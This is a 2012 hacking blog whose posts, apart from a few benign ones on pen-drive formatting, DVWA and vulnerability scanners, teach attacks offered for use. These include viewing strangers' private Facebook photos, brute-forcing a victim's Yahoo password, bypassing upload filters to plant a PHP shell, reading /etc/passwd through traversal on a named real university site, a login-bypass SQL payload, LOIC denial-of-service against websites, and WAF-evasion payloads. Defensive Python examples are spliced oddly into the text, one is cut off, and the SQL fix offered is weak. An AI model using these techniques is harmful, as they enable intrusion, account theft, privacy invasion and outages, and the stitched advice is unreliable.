Hack Virus

Thursday 14 June 2012

How to Format a Pen Drive in NTFS Type in Windows 7

We all know that pen drives default to FAT/FAT32, but if we want to use a pen drive as a system drive or for installing Windows we need to change that.
In this post I show you how to convert a FAT drive to the NTFS (system) type.
Step 1: Insert the pen drive and run a virus scan, deleting any viruses found, because viruses may affect your USB drive's efficiency.
Step 2: Back up all the data on the pen drive.
Step 3: Go to My Computer and right-click the pen drive icon.
Step 4: Go to the Format option and click 'Restore Device Defaults'.


After this, open the File System column and select NTFS.


Now click 'Start' and wait a few seconds.

After formatting, the message "Format Complete" appears; press 'OK'.


Your device is ready for use, and you can now use it as a system device.

NOTE: If you want to format the pen drive as NTFS and use it as a bootable device from the command prompt, see my earlier post.

Tuesday 12 June 2012

SEARCH ENGINE OPTIMIZATION

Now we will move on to SEO (Search Engine Optimization), then software and cracking, then proxies, and then hacking into other people's computers.
These are the next chapters.
Let's start learning SEO.
Well, SEO gives us exactly the thing we want to get from Google. Suppose you are searching for something on Google; Google gives you more than 100,000 pages, and it is very difficult to find exactly what you need in a single shot. SEO gives you exactly the thing you need. Let's start SEO.
Go here:
http://newyears.noo.com/noo/m/browse...wevent/id/518/
There you can see this line:
"New Years Eve at Pink Elephant"
This is the "title" of the web page.
The link I posted above is the "url",
and all the data written on the page is the "text".
Now, suppose you want to search Google for a forum; simply type
inurl:forum
I mean, whenever you have to search for something in the URL, write
inurl:desired thing
Whenever you have to search for something in the text, write
intext:desired thing
Well, I know most of you already know these things, but to those who don't: please try to understand this. Without SEO you will have a lot of problems while hacking a website for SQL injection, searching for cracks on the internet and for directory traversal; it is a very essential thing.
Well, now do some practice with what I wrote here.

Suppose you want to search for New Year celebrations; simply write in Google
intitle:new year celebration
If you want to search for a website's login page, type
intext:login inurl:website address
and search for it.
Now suppose you want to find something on a specific website; use this syntax:
site:website full address the thing you want to search for on that website
This syntax is really very good.
Now suppose you want to search for a PDF or DOC file; simply use this syntax:
filetype:pdf
The next thing in SEO is
related-named stuff. You know that Yahoo is a search

THE SUMMARY OF THE CHAPTER

[1] To search for something in the URL use "inurl:"
[2] To search in the title use "intitle:"
[3] To search in the text use "intext:"
[4] To get a file of a specific type use "filetype:"
[5] To restrict your search to a website use "site:websiteaddress your desired search item"
[6] To get information about a website use "info:website full address"
[7] To get related sites use "related:website full address"
[8] To keep a term out of your search results, put a minus (dash) sign in front of it.
To those reading this kind of thing for the first time: I request you to practise a lot with all of these syntaxes.
A good searcher always uses these techniques. You can find many books on this on Google; I have read all of them and then written down the results derived from them.
Please practise a lot.

Monday 11 June 2012

How to view Private Facebook Profiles

Learn how to view private Facebook profiles

In this post I will tell you how to view private Facebook profiles. This latest hack proves that anyone in the world is able to view anyone's private tagged pictures. This is why Facebook is not private; the hole is still open even after such publicity all over the web. It is a major security threat.
Have you ever wanted to see pictures of an enemy but couldn't because his or her Facebook account was set to private? Well, that's all going to change, because I will show you a very simple way to view private Facebook profiles.

Method:

1. Log in to your Facebook account at www.facebook.com

2. Search for the person.

3. Find the person's ID number by clicking on "Send message".

5. Copy the ID number into the link, replacing the placeholders:

http://www.facebook.com/photo.php?pid=1234567&id=[Person’s ID]&op=1&view=all&subj=[Person’s ID]

6. Copy and paste the link into your browser.

7. You should be able to see 10-20 pictures before Facebook denies you access.

Saturday 9 June 2012

Find email via brute force

Here is a tutorial on finding email IDs through brute force. It is not a very efficient process, because it takes a lot of time.

Procedure:

1. Download the brute force software.

2. Extract it to the desktop and run it.

3. In the target bar write:
pop.mail.yahoo.com

4. Type must be: POP3

5. Set connections to 60 and timeout to 60.

6. Make sure you check ''Single User''.

7. Once Single User is checked, write the victim's Yahoo account ID in that bar; for example, for googleboy@yahoo.com the ID is googleboy.

8. Set password mode to ''Brute Force''.

9. Then click ''Range'' (a new window will pop up).

10. Make sure you set ''Min Length'' to 6 and ''Max Length'' to 16.

11. Then set a custom range; by default it contains Abcd... etc. and some numbers.

12. Click OK.

If you have any problem, ask here and I will try to resolve it.
About the Author
XEO Hacker, the founder of Hack With Style (HWS).

Friday 8 June 2012

How Websites Get Hacked With FileUpload Vulnerability?

Hi, in this post I show you another method of website hacking.
The vulnerability we are about to demonstrate is, in my opinion, the number one reason why websites get hacked and are exploited further to the server level. When a hacker performs a SQL injection attack on a website he needs a way to get shell-level access and install a PHP backdoor, so he can touch other files on the server or compromise the server itself if it is vulnerable. If we secure our uploads and restrict our upload area so that it does not allow the upload of files other than images, we can protect our upload area.

However, there is a problem: PHP files can still be uploaded by various methods. The most common method is renaming the PHP backdoor to one of the following names and then uploading the shell.

shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
However, there is also a method to block the upload of the above file names. But there is another way to bypass it even if uploading files with the above names is blocked: we will use Tamper Data for this purpose.

Step 1

Install the Live HTTP Headers Firefox extension, then go to the upload section. Open Live HTTP Headers and upload the shell. Now if you try to go to the link where your shell is uploaded it will give you an error (only on some websites), so we will have to change the hidden .php.jpg extension to .php.

So, having uploaded the shell with Live HTTP Headers open, you should find the request where the shell was uploaded. Select it and then click the Replay button.

Step 2

After uploading, find the directory where your file was uploaded; for example, if you uploaded it into images then it will be at http://website/images/shell.php. The rest of the steps are self-explanatory.

How To Protect Your Website from the FileUpload Vulnerability?

That's a separate topic and will be explained in a separate post. For now, I would recommend installing a third-party file-uploading service, where the file gets uploaded to the service's server, not yours.
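Server-side handling that defeats both the renaming trick and the header-replay trick described above, written here as an added example (it is not the post's code or any framework's): the stored name is chosen by the server from the file's magic bytes, so neither the client-supplied name nor a replayed request with an edited extension decides what lands on disk. The signature table and all sample inputs are constructed for the example.

```python
"""Server-side checks for an image upload endpoint (added example).
Rejects every double-extension name listed in the post and ignores the
client-supplied extension when naming the stored file."""
import os
import re
import secrets

# Magic bytes for the only image types the endpoint accepts (well-known values).
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Anything but letters, digits, dot, dash and underscore in a name is suspicious.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def client_name_is_acceptable(filename: str) -> bool:
    """Reject names carrying more than one extension or any separator such as
    ';', ':' or '%' (all of the post's shell.php*.jpg variants fail here)."""
    base = os.path.basename(filename)
    if not SAFE_NAME.fullmatch(base):
        return False
    parts = base.split(".")
    # exactly "<stem>.<ext>" with a non-empty stem and an allow-listed extension
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1].lower() in ALLOWED_EXTENSIONS


def sniff_image_type(data: bytes):
    """Return the extension implied by the file's magic bytes, or None."""
    for sig, ext in IMAGE_SIGNATURES.items():
        if data.startswith(sig):
            return ext
    return None


def stored_name_for_upload(filename: str, data: bytes):
    """Decide whether to store the file and under what name.
    Returns the server-chosen name, or None if the upload is rejected.
    The client's name never reaches the filesystem: only the sniffed type does."""
    if not client_name_is_acceptable(filename):
        return None
    ext = sniff_image_type(data)
    if ext is None:
        return None
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs: the post's bypass names plus one honest upload.
BYPASS_NAMES = [
    "shell.php;.jpg", "shell.php.jpg", "shell.php..jpg",
    "shell.php.jpg:;", "shell.php.jpg%;", "shell.php.jpg;",
]
FAKE_PHP = b"<?php echo 'not an image'; ?>"          # constructed payload body
REAL_JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # constructed JPEG prefix


def run_demo():
    """Returns (rejected_count, accepted_name) for the constructed inputs."""
    rejected = sum(stored_name_for_upload(n, FAKE_PHP) is None for n in BYPASS_NAMES)
    accepted = stored_name_for_upload("holiday.jpg", REAL_JPEG_HEADER)
    return rejected, accepted


if __name__ == "__main__":
    print(run_demo())
```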

About the author:

Minhal Mehdi is a tech blogger and ethical hacker. He runs a blog, http://www.devilscafe.in, where he writes about exploits and vulnerabilities.

Source:-www.rafayhackingarticles.net

Thursday 7 June 2012

Make the Best Out Of A Vulnerability Scanner?

As your knowledge and experience in security increase, you start looking at a variety of security solutions that could help you do a better job and automate many of the processes. One of the first products that you would probably test is a vulnerability scanner. That's an excellent first step, but now comes the harder part: if you are new to vulnerability scanning, how do you go about making effective use of this solution?
Not all vulnerability scanners are the same, and some of the functionality mentioned in this article may or may not be available to you; however, I recommend that you go for a solution that gives you as wide a range of features as possible.

Inventory

Most good vulnerability scanners will keep an eye on the hardware and software deployed on your network. This is very valuable information. Run an inventory on your network to ensure that you are aware of everything that is installed and that it has been approved for use. Once completed set your vulnerability scanner to notify you of any changes from this baseline.

Scheduled scans

If your vulnerability scanner allows you to configure a periodic scan, create a schedule to scan your network daily. Select a time that least impacts your organization because a vulnerability scan can be slightly disruptive.

Port scanning

Malware can be stealthy and hide itself in several ways, therefore the more methods in use, the higher the rate of detection. Take note of any open ports each system has and look out for ports that should not be open and investigate further since this may indicate the presence of malware.

Patch management

A good vulnerability scanner will let you know what patches are missing on your system. Most will also allow you to deploy the patches. Before that, however, it is best practice to set up a testing environment that mirrors your live environment. This test network can be based on the inventory previously obtained using the vulnerability scanner. Test the missing patches on this test environment to ensure that they do not conflict with the current network setup – if all is well deploy them to the live environment.

Other vulnerabilities

Not all vulnerabilities can be addressed through patch management; some do not have patches available and others are configuration related. A good vulnerability scanner will point these out, give you information on such vulnerabilities and provide you with information on how to address them.

Security policies and software

A good vulnerability scanner will outline the security policies set on each of the scanned machines. It will also check if the antivirus software installed is up to date.
Monitoring these six basic items will ensure you have the necessary information to keep your network secure.

Always keep an eye on hardware and software changes and update the test environment accordingly. Carry out frequent scheduled scans, look out for open ports, and set notifications so that you are informed when a new port is opened. Regularly apply patches and fix any vulnerabilities that are detected as soon as possible.


This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. Learn more on what to look out for when choosing a vulnerability scanner.

Source:- www.rafayhackingarticles.net

Wednesday 6 June 2012

Learn Website Hacking And Security With DVWA Tools

Hi, I am Deepesh, and in this post I teach you how to become good at website hacking and web application security. Even if you have an idea of how some popular web application attacks work, you still need a safe environment to practise what you have learned, because you are not allowed to access any website, even for testing purposes, unless you are authorized to do so. This is where Damn Vulnerable Web App (DVWA) comes into play.
Basically, Damn Vulnerable Web App (DVWA) is a PHP/MySQL web app which is damn vulnerable. DVWA allows you to learn and practise web application attacks in a safe environment. Its latest version is DVWA 1.7.

Vulnerabilities

  • SQL Injection
  • XSS (Cross Site Scripting)
  • LFI (Local File Inclusion)
  • RFI (Remote File Inclusion)
  • Command Execution
  • Upload Script
  • Login Brute Force
  • Blind SQL Injection 
And much more.


Official warning

It should come as no shock, but this application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any working web server, as it will be hacked. It's recommended that you download and install XAMPP onto a local machine inside your LAN which is used solely for testing.
Watch this video for installation:
http://www.youtube.com/watch?v=GzIj07jt8rM

Now I have pasted the information from DVWA:



############################################################
################# DAMN VULNERABLE WEB APP ##################
############################################################

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

############
# WARNING! #
############

Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any working web
server as it will be hacked. I recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing.

We do not take responsibility for the way in which any one uses Damn Vulnerable Web App (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.

###########
# License #
###########

This file is part of Damn Vulnerable Web App (DVWA).

Damn Vulnerable Web App (DVWA) is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

Damn Vulnerable Web App (DVWA) is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with Damn Vulnerable Web App (DVWA).  If not, see http://www.gnu.org/licenses/.

################
# Installation #
################

Default username = admin
Default password = password


The easiest way to install DVWA is to download and install 'XAMPP' if you do not already have a web server setup.

XAMPP is a very easy to install Apache Distribution for Linux, Solaris, Windows and Mac OS X. The package includes the Apache web server, MySQL, PHP, Perl, a FTP server and phpMyAdmin.

XAMPP can be downloaded from:
http://www.apachefriends.org/en/xampp.html

Simply unzip dvwa.zip, place the unzipped files in your public html folder, then point your browser to http://127.0.0.1/dvwa/index.php


##################
# Database Setup #
##################

To set up the database, simply click on the Setup button in the main menu, then click on the 'Create / Reset Database' button. This will create / reset the database for you with some data in.

If you receive an error while trying to create your database, make sure your database credentials are correct within /config/config.inc.php

The variables are set to the following by default:

$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '';
$_DVWA[ 'db_database' ] = 'dvwa';

An explanation of these variables:

$_DVWA[ 'db_user' ] = 'your_database_username';
$_DVWA[ 'db_password' ] = 'your_database_password';
$_DVWA[ 'db_database' ] = 'your_database_name';


###################
# Troubleshooting #
###################

For the latest troubleshooting information please visit: http://www.dvwa.co.uk/forum/viewtopic.php?f=5&t=7


+Q. SQL Injection won't work on PHP version 5.2.6.

-A. If you are using PHP version 5.2.6 you will need to do the following in order for SQL injection and other vulnerabilities to work.

In .htaccess:

    Replace:

    <IfModule mod_php5.c>
    php_flag magic_quotes_gpc off
    #php_flag allow_url_fopen on
    #php_flag allow_url_include on
    </IfModule>

    With:

    <IfModule mod_php5.c>
    magic_quotes_gpc = Off
    allow_url_fopen = On
    allow_url_include = On
    </IfModule>

+Q. Command execution won't work.

-A. Apache may not have high enough privileges to run commands on the web server. If you are running DVWA under Linux make sure you are logged in as root. Under Windows log in as Administrator.
   
+Q. My XSS payload won't run in IE.

-A. If you're running IE8 or above, IE actively filters any XSS. To disable the filter you can set the HTTP header 'X-XSS-Protection: 0' or disable it from Internet Options. There may also be ways to bypass the filter.


# Contact: dvwa@dvwa.co.uk 
# Website: http://www.dvwa.co.uk
# Download: http://sourceforge.net/projects/dvwa/
# SVN: http://dvwa.svn.sourceforge.net/svnroot/dvwa

# Created by: The DVWA team.


Source:- www.rafayhackingarticles.net 

Tuesday 5 June 2012

Hack a website using a Directory Traversal attack?

What is the root directory of a web server?

It is a specific directory on the server in which the web content is placed and can be seen by website visitors. Directories other than the root may contain sensitive data which the administrator does not want visitors to see. Everything accessible to a visitor on a website is placed in the root directory; the visitor cannot step out of it.

What does ../ or ..\ (dot dot slash) mean?

The ..\ instructs the system to go one directory up. For example, if we are at C:\xx\yy\zz and type ..\, we reach C:\xx\yy.

Typing ..\ again, we reach C:\xx.

Let's again go to C:\xx\yy\zz. Now suppose we want to access a text file abc.txt placed in folder xx. We can type ..\..\abc.txt. Typing ..\ two times takes us two directories up (that is, to directory xx), where abc.txt is placed.

Note: it's ..\ on Windows and ../ on UNIX-like operating systems.

What is a Directory Traversal attack?

Directory traversal is an HTTP exploit which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

The goal of this attack is to access sensitive files placed on the web server by stepping out of the root directory using dot dot slash.

The following example will make everything clear.

Visit this website, which is vulnerable to a directory traversal attack:

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=notification.php

This web server is running on a UNIX-like operating system. There is a directory 'etc' on UNIX/Linux which contains the configuration files of programs that run on the system. Some of the files placed in the 'etc' directory are passwd, shadow, profile and sbin.

The file etc/passwd contains the login names of users, and even passwords too.

Let's try to access this file on the web server by stepping out of the root directory. Look carefully at the position of the directories on the web server.

We do not know the actual names and contents of the directories except 'etc', which is a default name, so I have marked them as A, B, C, E or whatever.

We are in directory F, accessing the web pages of the website.
Let's type this in the URL field and press Enter:


http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=etc/passwd

This will look for the directory 'etc' inside F. But obviously there is nothing like that in F, so it will return nothing.

Now type
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../etc/passwd
Now this will step up one directory (to directory E) and look for 'etc', but again it will return nothing.

Now type 

http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../etc/passwd
Now this will step up two directories (to directory D) and look for 'etc', but again it will return nothing.

So, proceeding like this, we arrive at this URL:
http://www.chitkara.edu.in/chitkara/chitkarauniversity.php?page=../../../../../etc/passwd

It takes us five directories up to the main drive and then into the 'etc' directory, and shows us the contents of the 'passwd' file.
To understand the contents of the 'passwd' file, visit http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format

You can also view etc/profile, etc/services and many other files, like backup files, which may contain sensitive data. Some files like etc/shadow may not be accessible because they are accessible only to privileged users.

Note: if proc/self/environ is accessible, you might upload a shell to the server; this is called Local File Inclusion.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user's input 
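What "effectively filter the user's input" looks like for a page parameter such as the one above, as an added example (not the post's code): the request is resolved against the web root and only served if the normalised path is still inside it, so every step of the F, E, D ... walk shown above is refused. The web root and the request list are constructed for the example.

```python
"""Resolving a user-supplied 'page' parameter safely (added example).
The include is only honoured when the resolved path still lies inside the
web root, so every '../' walk the post shows is refused."""
import posixpath

WEB_ROOT = "/var/www/site/pages"   # assumed web root for the example


def resolve_page(web_root: str, requested: str):
    """Return the absolute path to include, or None if the request escapes
    the root or uses anything other than a plain relative file name."""
    # Windows uses '..\'; normalise so a backslash cannot smuggle a segment.
    candidate = requested.replace("\\", "/")
    if candidate.startswith("/") or "\0" in candidate:
        return None
    # Collapse '.', '..' and duplicate slashes lexically (no filesystem access).
    normalised = posixpath.normpath(posixpath.join(web_root, candidate))
    # The resolved path must start with "<root>/" (a bare prefix test would let
    # "/var/www/site/pages-old" through, hence the trailing separator).
    if not normalised.startswith(web_root.rstrip("/") + "/"):
        return None
    return normalised


def traversal_depth(requested: str) -> int:
    """Count how many directories a request walks up, mirroring the post's
    F -> E -> D ... walk; useful for logging or alerting on suspicious requests."""
    depth = 0
    for seg in requested.replace("\\", "/").split("/"):
        if seg == "..":
            depth += 1
    return depth


# Constructed requests, following the post's walk-through.
REQUESTS = [
    "notification.php",
    "etc/passwd",
    "../etc/passwd",
    "../../etc/passwd",
    "../../../../../etc/passwd",
    "..\\..\\..\\..\\..\\etc\\passwd",   # Windows-style separators
    "/etc/passwd",                      # absolute path
]


def classify(requests=REQUESTS):
    """Map each request to the path that would be served, or 'REJECTED'."""
    out = {}
    for r in requests:
        resolved = resolve_page(WEB_ROOT, r)
        out[r] = resolved if resolved else "REJECTED"
    return out


if __name__ == "__main__":
    for req, result in classify().items():
        print(f"{req:35} depth={traversal_depth(req)}  -> {result}")
```

Note that "etc/passwd" without any "../" is accepted, exactly as the post observes: it stays inside F and simply resolves to a file that does not exist there.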


Source:- www.rafayhackingarticles.net

Saturday 2 June 2012

Protect Your Website Against SQL Injection




Hacker-one: "YES, I DID IT!!!"

Hacker-two: "What?"

Hacker-one: "I HACKED ANOTHER SITE!!!"

Hacker-two: "Great!!! How did you do that?"

Hacker-one: "SQL INJECTION!!! :p"

Yes, one of the common methods used by hackers is SQL INJECTION.

Sites get hacked by SQL injection due to a loophole that developers leave most of the time while developing a web application.

I will explain today how to avoid SQL injection when you are developing a web application with PHP.

I will explain with the help of an example. Suppose we have text fields on our form:

1. User Name

2. Password

and a login button.

When we login, the validation for the valid user is checked on the back-end. If the user is a valid user, he logs into the system else an error message “incorrect username or password” is shown.

What happens on the back-end:

$userName = $_POST['userName'];

$password = $_POST['password'];

$sqlQuery = "select * from users where user_name= '" . $userName . "' and user_password= '" . $password . "' ;";

This is where the developer has left a loophole. If, instead of the password, I enter ' or 'a'='a, the password field has the value

$password is ' or 'a'='a

Let's place this value in the query, and the query becomes

$sqlQuery = "select * from users where user_name= '" . $userName . "' and user_password= '' or 'a'='a' ;";

You can see clearly that the password doesn't match, but the other condition 'a'='a' matches, so the OR operator takes effect and the user logs in to the system without knowing the actual password. I could even give you the names of some famous websites where you can inject SQL or use this technique.

HOW TO AVOID IT?

Don't treat the field values as above.

Use this function:

function BlockSQLInjection($str) {
    // replace the quote characters that can break out of the SQL string literal
    return str_replace(array("'", '"'), array("&#39;", "&quot;"), $str);
}

This will replace the characters (those that can break the string) in the string.

So you can use this function as

$userName = BlockSQLInjection($_POST['userName']);

$password = BlockSQLInjection($_POST['password']);


Now the hacker won't be able to break the query string.
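The login check above, reproduced as an added example in Python against an in-memory SQLite database (not the post's PHP): the concatenated query admits the post's ' or 'a'='a password, while the parameterised query does not. The PHP equivalent of the second function is a PDO or mysqli prepared statement. The users table and credentials are constructed for the example.

```python
"""The post's login check, concatenated versus parameterised (added example)."""
import sqlite3


def make_db():
    """Constructed users table with one account (password stored in plain text
    only to mirror the post's query; a real system stores a password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, user_password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!')")
    return conn


def login_concatenated(conn, user_name, password):
    """Mirrors $sqlQuery = "select * from users where user_name='".$userName."' ...".
    User input becomes part of the SQL text, so quotes change the query itself."""
    query = ("select * from users where user_name= '" + user_name +
             "' and user_password= '" + password + "'")
    rows = conn.execute(query).fetchall()
    return len(rows) > 0


def login_parameterised(conn, user_name, password):
    """The same check with placeholders: the driver sends the values separately,
    so a quote in the password is just a character to compare against."""
    rows = conn.execute(
        "select * from users where user_name = ? and user_password = ?",
        (user_name, password),
    ).fetchall()
    return len(rows) > 0


def demo():
    """Returns (bypass_works_on_concat, bypass_works_on_param, real_login_ok)."""
    conn = make_db()
    injected = "' or 'a'='a"          # the post's payload, constructed here
    return (
        login_concatenated(conn, "alice", injected),
        login_parameterised(conn, "alice", injected),
        login_parameterised(conn, "alice", "S3cret!"),
    )


if __name__ == "__main__":
    print(demo())
```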

We have many frameworks in PHP that provide this functionality, such as quotes_to_entities($string) in CodeIgniter.

Use a design pattern when you are building a big application: the model, controller and view layers and a DAO (data access object) layer must be implemented to make it loosely coupled and extensible.

A huge number of sites have been developed in core PHP, where no framework is used. WordPress is very secure, but when it comes to plugins (that we download and use), they can have loopholes inside them. Stay alert while developing web applications; you never know when you are going to get hacked. Stay blessed! :)

Good Luck !


About The Author

Danyal Sandeelo is a Software Developer at "breezecom".

Friday 1 June 2012

Flood/Hack a website with denial of service attack

What is a Denial Of Service Attack?


A denial of service attack (DoS) is an attack through which a person can render a system unusable, or significantly slow it down for legitimate users, by overloading its resources so that no one can access it.
If an attacker is unable to gain access to a machine, he will most probably just crash the machine to accomplish a denial of service attack; this is one of the most used methods of website hacking.

Types of denial of service attacks

There are several general categories of DoS attacks. Popularly, the attacks are divided into three classes:

bandwidth attacks,
protocol attacks,
logic attacks.


What is Distributed Denial of Service Attack?

In a DDoS attack, the attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies, to launch an attack against a target or network at the same time.
This makes it difficult to detect, because the attacks originate from several IP addresses. If a single IP address is attacking a company, it can block that address at its firewall. If it is 30,000 addresses, this is extremely difficult.

Damages made By Denial of service attack:

Over the past years denial of service attacks have done a huge amount of damage, and many have been victims of this attack.
It's real: on February 6th, 2000, the Yahoo portal was shut down for 3 hours. Then the retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning the mayhem continued, with the online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

This attack also recently hit Twitter, on 6th August 2009; a lot of people had trouble logging on to Twitter. It was brought down by a denial of service attack that tied up their servers so no one could log on. Websites like Facebook, eBay etc. have also been victims of this attack.

Now I will show you how you can flood a website with a denial of service attack. For this tutorial we will be using one of the most effective and least known tools, called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org. This program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool works best with high internet speeds, and try not to go for impossible targets (like Google, Myspace, Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Prerequisites: Download LOIC (Low Orbit Ion Cannon) and open it up.
(I am not giving a download link because then I will be accused of aiding hackers; try googling.)

Step 1: Type the target URL in the URL box.

Step 2: Click lock on.

Step 3: Change the threads to 9001 for maximum efficiency.

Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"

Feel free to tweak these settings and play around with the program to get the best performance. Then minimize it and go do whatever you need to do; the program will take care of the rest!

Source:- www.rafayhackingarticles.net 

Thursday 31 May 2012

SQL Injection Filter Evasion Part 1

In this tutorial I will explain some of the basics of SQL injection filter evasion. This is the first of two articles I will post on SQL injection filter evasion and bypassing. In this post I am not going to teach you the basics of SQL injection; I will assume that you already know them, because come on, everyone talks about it, and you will find tons and tons of posts on forums related to the basics of SQL injection. In this post I will talk about common methods used by hackers and pentesters for evading IDS, IPS and WAFs such as ModSecurity, dotDefender etc.


WebApplication Firewalls:

 

According to webappsec: "Web Application Firewall (WAF): An intermediary device, sitting between a web-client and a web server, analyzing OSI Layer-7 messages for violations in the programmed security policy. A web application firewall is used as a security device protecting the web server from attack."

Almost all web application firewalls and IDSs use signature-based protection, where they look for common inputs such as "' Or 1=1", "Or x=x" etc. But in my opinion web application firewalls are only good for detecting automated tools and script kiddies. However, if the tool you are using for attacking a SQL-injectable database is open source, such as SQLMAP, you can easily modify it to evade a web application firewall.


Detecting A WAF:

Before learning about bypassing the WAF, you must know how to detect a web application firewall. There are numerous methods of detecting whether the target website is using one.

Prompt Message:

1. If you are attacking a website and you get an error like "Hacking attempt detected" or "Page not found", you are up against a WAF.

Cookies:

The most common method of detecting a web application firewall is by capturing the HTTP request; lots of WAFs add their own cookie to the HTTP communication.

Here is a live Brazilian website using a WAF. The cookie value "WAT" shows that the target host is using a WAF:

        GET /news.asp?PageId=254 HTTP/1.1
        Host: www.poupex.com.br
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.12)
        Accept: image/png,*/*;q=0.5
        Accept-Encoding: gzip,deflate
        Keep-Alive: 300
        Proxy-Connection: keep-alive
        Referer: http://www.SomeSite.com
        Cookie: ASPSESSIONCWKSPSVLTF=OUESYHFAPQLFMNBTKJHGQGXM; ns_af=xL9sPs2RIJMF5GhtbxSnol+xU0uSx; ns_af_.SomeSite.com_%2F_wat=KXMhOJ7DvSHNDkBAHDwMSNsFHMSFHEmSr?nmEkaen19mlrwBio1/lsrzV810C&



dotDefender:

If you are up against dotDefender you will get the following error message:

Observing the HTTP response:

If you see a response like the following whenever you make a malicious HTTP request, you are probably up against a ModSecurity WAF.

HTTP/1.1 501 Method Not Implemented
Date: Fri, 27 Jun 2008 23:30:54 GMT
Allow: TRACE
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1




WEBAPPLICATION Firewall Evasion:



There are tons and tons of methods to evade a web application firewall. Here are some of them:

1. Comments.
2. Changing Cases.
3. Encoding.

And much more.

Example of a sample IDS and WAF signature:

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection attempt detected, Your IP has been logged";
flow:to_server,established; content:"' or 1=1 --"; nocase; sid:1; rev:1;)

The above signature tells the WAF that if the attacker inputs the content "' or 1=1 --" into the web page, it should display the message "SQL Injection attempt detected, Your IP has been logged".


Bypassing The Signature:


Such poorly written signatures can be easily bypassed. Think for a second: what if the attacker inputs ' OR 2=2? Isn't 2=2 just as true? How about OR 3=3, and so on? So such poorly written signatures are good for nothing. You can also add comments in order to bypass more complex signatures, e.g. OR 2/**/=/**/2.

Comments:

Comments are one of the easiest ways to defeat a WAF, as many signatures do not account for inline comments; they only look for the malicious keywords with plain whitespace between them.

Union statement against a WAF without comments:

www.site.com/a.php?id=123 union select 1,2,3,4,5-- BLOCKED

Union statement against a WAF with comments:

www.site.com/a.php?id=123 union/*We are bypassing the WAF*/select/*Rafay Hacking Articles*/1,2,3,4,5-- ALLOWED


Changing Cases:

Some WAFs have no rule or signature that matches the keywords in upper or mixed case, so changing the case of the keywords gets past them. Here are some examples of a UNION statement in mixed case:

uNiOn aLl sElEcT 
UnIoN aLL SELECT

You can combine mixed case with comments for better results:
www.site.com/a.php?id=123 uNiOn/*We are bypassing the WAF*/AlL/*Rafay Hacking Articles*/sEleCt 1,2,3,4,5--
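To see why the tautology, comment and case tricks from the sections above work against the sample signature, and what a rule has to do to survive them, here is an added example (not code from the original post, and not any WAF product's rule set). NAIVE_SIGNATURE is the content match from the post's rule; normalize() and SQLI_PATTERN are this example's own suggestion of stripping comments, collapsing whitespace and lower-casing before matching. The payloads are constructed from the post's examples.

```python
"""Naive signature vs. normalize-then-match, run over the post's payloads."""
import re

# The content match from the post's rule, applied case-insensitively (nocase).
NAIVE_SIGNATURE = "' or 1=1 --"


def naive_match(payload):
    """The rule as written: one fixed string, case-insensitive."""
    return NAIVE_SIGNATURE in payload.lower()


def normalize(payload):
    """Undo the evasions the post lists before matching:
    drop /* ... */ inline comments, collapse whitespace runs, lower-case."""
    text = re.sub(r"/\*.*?\*/", " ", payload, flags=re.S)  # comment -> one space
    text = re.sub(r"\s+", " ", text)                        # runs of whitespace
    return text.strip().lower()


# Tautology (' or N=N) and UNION [ALL] SELECT, matched on the normalized text.
SQLI_PATTERN = re.compile(
    r"(?:'\s*or\s*\d+\s*=\s*\d+)|(?:\bunion\b\s*(?:all\s*)?\bselect\b)"
)


def hardened_match(payload):
    """Normalize first, then match on structure instead of a literal string."""
    return SQLI_PATTERN.search(normalize(payload)) is not None


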